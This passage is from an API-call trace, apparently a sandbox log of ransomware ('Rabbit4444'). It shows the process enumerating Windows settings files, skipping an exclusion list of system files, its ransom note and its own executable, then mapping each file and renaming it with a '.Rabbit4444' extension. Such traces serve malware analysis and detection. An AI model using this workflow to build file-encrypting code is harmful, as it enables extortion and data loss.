"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorcolor.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.992] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.992] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14830279238) returned 1 [0056.992] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1300) returned 1 [0056.992] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0056.992] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.992] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0056.994] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0056.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.995] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.995] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.995] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14830621210) returned 1 [0056.996] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0056.996] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.996] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.996] CloseHandle (hObject=0x298) returned 1 [0056.996] CloseHandle (hObject=0x278) returned 1 [0056.996] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms.Rabbit4444") returned 195 [0056.996] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorcolor.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorcolor.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.997] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bca64a8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1bca64a8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", cAlternateFileName="AAD5FB~1.SET")) returned 1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2=".") returned 1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="..") returned 1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="windows") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="boot") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.997] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.997] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms" [0056.997] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.997] lstrlenW (lpString="AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms") returned 66 [0056.997] lstrlenW (lpString="Rabbit4444") returned 10 [0056.997] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.997] lstrlenW (lpString=".dll") returned 4 [0056.997] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.998] lstrlenW (lpString=".lnk") returned 4 [0056.998] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.998] lstrlenW (lpString=".ini") returned 4 [0056.998] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.998] lstrlenW (lpString=".sys") returned 4 [0056.998] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.998] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorsize.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.998] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.998] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14830871768) returned 1 [0056.998] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1294) returned 1 [0056.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.998] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.998] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0056.999] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.000] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.000] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.001] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14831144134) returned 1 [0057.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.001] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.001] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.001] CloseHandle (hObject=0x298) returned 1 [0057.001] CloseHandle (hObject=0x278) returned 1 [0057.001] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms.Rabbit4444") returned 194 [0057.001] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorsize.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorSize.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_mousecursorsize.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.002] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c013b28, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1c013b28, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x546, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", cAlternateFileName="AADFD0~1.SET")) returned 1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.002] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.002] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms" [0057.002] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.003] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms") returned 78 [0057.003] lstrlenW (lpString="Rabbit4444") returned 10 [0057.003] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.003] lstrlenW (lpString=".dll") returned 4 [0057.003] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.003] lstrlenW (lpString=".lnk") returned 4 [0057.003] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.003] lstrlenW (lpString=".ini") returned 4 [0057.003] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.003] lstrlenW (lpString=".sys") returned 4 [0057.003] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isautostartenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.003] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.003] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14831385191) returned 1 [0057.003] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1350) returned 1 [0057.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.003] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.005] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.005] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.006] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.006] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14831668181) returned 1 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.006] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.006] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.006] CloseHandle (hObject=0x298) returned 1 [0057.006] CloseHandle (hObject=0x278) returned 1 [0057.006] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms.Rabbit4444") returned 206 [0057.006] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isautostartenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsAutoStartEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isautostartenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.007] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c2e87e0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1c2e87e0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x54b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", cAlternateFileName="AAFBF6~1.SET")) returned 1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.007] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.007] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms" [0057.007] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.008] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms") returned 78 [0057.008] lstrlenW (lpString="Rabbit4444") returned 10 [0057.008] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.008] lstrlenW (lpString=".dll") returned 4 [0057.008] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.008] lstrlenW (lpString=".lnk") returned 4 [0057.008] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.008] lstrlenW (lpString=".ini") returned 4 [0057.008] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.008] lstrlenW (lpString=".sys") returned 4 [0057.008] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.008] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isduckaudioenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.008] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.008] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14831901345) returned 1 [0057.008] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1355) returned 1 [0057.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0057.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0057.008] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.010] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.010] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.011] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14832156383) returned 1 [0057.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0057.011] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0057.011] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.011] CloseHandle (hObject=0x298) returned 1 [0057.011] CloseHandle (hObject=0x278) returned 1 [0057.011] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms.Rabbit4444") returned 206 [0057.011] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isduckaudioenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsDuckAudioEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isduckaudioenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.012] FindNextFileW (in: 